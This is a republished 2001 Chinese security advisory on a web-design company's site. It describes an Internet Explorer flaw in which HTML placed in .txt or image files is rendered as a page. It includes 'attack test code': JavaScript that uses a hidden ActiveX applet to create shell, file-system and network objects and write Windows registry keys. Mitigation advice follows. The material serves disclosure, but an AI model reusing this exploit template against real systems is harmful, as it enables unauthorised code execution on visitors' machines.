北京:网站制作 网站建设 网站设计 CAD制图 效果图制作 建筑漫游 机械制图
最佳方案:CAD制图-3D效果图-3D动画制作-建筑漫游和机械效果图
24小时咨询热线:13366838023
首  页 新闻动态 域名注册 虚拟主机 主机托管 专线接入 图形图象艺术设计 CAD机械图制作 3D效果图制作
  建筑漫游 网页制作教程 程序编程教程 网站推广教程 多媒体制作 操作系统教程 图形图象处理教程 平面设计教程 网络安全教程
技术文章
网站的Google排名内部优化攻…
Auto CAD中为三维图形添加尺…
网站制作:如何确定网站栏目…
CSS文件应该保持整洁和统一
符合web标准的网页中调用Fla…
微软就发布了IE8的第二个Bet…
08年全球游戏软件销量同比增…
虚拟建筑场景漫游技术及其应…
三成鲜花通过QQ、网站在线卖…
假冒网站成本只需百元
美家庭学校封杀10大网站排名…
数字光魔地产动画 互动建筑漫…
如何打造实用网站?
客户案例
arca laska服装品牌
北京莱比特环保科技有限公司…
渲淇犬舍
网站建设:绿色健峰
网站制作:天津信汇制药股份有…
网站建设:北京凯伦葡萄酒有限…
网站制作:泰赫雅特汽车销售服…
网站制作:北京顺新联华商贸公…
网站制作:3818库画廊
北京天成鑫缘家政服务中心
美术家协会国际双年展
加拿大瑞潮商业顾问有限公司…
北京新二灯霓虹灯饰有限公司…
  更多>>  


Crazybird发现的一个,有争议的IE新BUG

来源:  

出现漏洞程序:IE4 ,IE5 ,IE5,IE6 ,Microsoft Word ,Microsoft Excel,Microsoft PowerPoint,Microsoft Outlook,腾讯explorer(IE所有版本都有问题。。我能找到的都测试过!)
描述:
利用IE对含有HTML语句的文本不检查扩展名达到欺骗用户访问病毒页面的目的
详细:
在NOTEPAD上写一份HTML文件。保存为.txt。上传至空间服务器,用IE访问URL。发现,IE把.txt误读成.html.更改扩展名.txt改成.jpg或者别的非下载类文件。IE都无法辨认文件类型。
利用这个IE漏洞。任何有一点主页制作知识的都可以成功利用此漏洞。由于用户的定式思维,只认为.html/.htm才会被入侵者利用。现在入侵者只要利用此漏洞。完全有能力在.txt.jpg.png....这些被认为十分安全的页面上做到html上所能做的一切攻击行为!甚至邮件附件,以IE直接WEB访问,查看信件的用户。完全没有安全的附件可直接查看!漏洞特别严重!
由于漏洞程序所属公司的不负责性,请用户特别小心,邪恶攻击者的非法利用!
以下是攻击测试代码:
<SCRIPT Language="javascript" type="text/javascript">
<!--

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
if (documents.cookie.indexOf("Chg") == -1)
{


Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"

}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();

// -->
</SCRIPT>

<img src=http://www.gnu.org/graphics/gnu-head-sm.jpg>
不受影响系统:
netscape(全都没问题。。)
解材决方案:
1)下载杀毒软件!已有的及时更新病毒库。将系统里比较危险的一些程序改名,比如format.com、deltree.exe等。。。。改成容易记忆的就行比如format.com可以改成format_0.com等。。。。

2)尽量不要去访问那些所谓的“黑客”网站。很多时候,你想从那学习攻击。实际上,您正在被攻击!

3)如果碰到非去不可的,但您又怀疑有危险的站点。请先访问这(http://crazybird.51.net/look.htm)您也可以把上面的源文件复制下来。另存为.htm文件。本地运行。但我不能保证您是否能看出来源文件是否有危险!访问网页,任何类型的网页,打开时如果出现"页面含有不安全的ActiveX"等信息时请注意,最好不要运行该ActiveX控件。同样不能保证任何恶意攻击文件都会给出这类警告!

4)邮件附件不要双击直接打开!请注意!是任何类型的附件都不要直接打开!存到文件夹后,用杀毒程序扫一遍。

5)及时更新系统补丁。

如果还有什么问题可以给我来信(Mail:cr4zybird@hotmail.com)
感谢:春之律,skywind,nETMonKEY,xiajian,Nancy 在测试和与微软交涉过程中给我的帮助!
crazybird
cr4zybird@hotmail.com
#CNFORCE
26/7/01发布。。 

2005-1-30 15:03:41

【关闭窗口】
友情链接: 格鲁吉亚旅游与投资
Copyright © 2001-2020 Beijing Aodu Haixun Tchnology Inc.All rights reserved. 版权所有:海讯资源
电  话:010-88409500 13366838023 网站制作专线:010-15210224336(微信同号)
传  真: 电子邮件:haixunceo@126.com